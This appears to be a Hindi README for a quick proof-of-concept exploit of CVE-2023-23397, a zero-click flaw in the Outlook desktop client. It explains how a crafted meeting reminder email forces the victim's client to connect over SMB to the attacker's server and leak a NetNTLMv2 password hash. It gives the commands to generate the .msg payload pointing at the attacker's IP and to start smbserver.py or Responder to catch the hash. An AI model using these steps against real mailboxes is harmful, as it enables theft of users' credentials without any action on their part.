
CVE-2023-23397 भेद्यता का सरल PoC, जिसका payload ईमेल द्वारा भेजा जाता है।
Outlook थिक क्लाइंट को प्रभावित करने वाली CVE-2023-23397 भेद्यता का सरल और जल्दबाज़ी में बनाया गया PoC।
Outlook में उपयोगकर्ता इनपुट पर नियंत्रण की कमी है, जो मीटिंग और अपॉइंटमेंट रिमाइंडर की ध्वनि को कॉन्फ़िगर करने की अनुमति देता है। वास्तव में, एक हमलावर उपयोगकर्ता की ओर से किसी भी हेरफेर के बिना (ज़ीरो क्लिक भेद्यता) पीड़ित को अपने सर्वर से कनेक्शन बनाने के लिए मजबूर कर सकता है।
इस भेद्यता का शोषण करने वाला हमलावर SMB अनुरोध के माध्यम से फंसे हुए उपयोगकर्ता के पासवर्ड पर आधारित NetNTLMv2 डाइजेस्ट प्राप्त करता है। मेल इनबॉक्स में आते ही अनुरोध ट्रिगर हो जाता है।
.msg पेलोड उत्पन्न करता है।एक सत्र में :
python CVE-2023-23397.py
usage: CVE-2023-23397.py [-h] -p PATH
CVE-2023-23397.py: error: the following arguments are required: -p/--path
python CVE-2023-23397.py --path '\\yourip\'
दूसरे सत्र में (smbserver या responder जैसा आप चाहें)।
smbserver.py -smb2support SHARE .
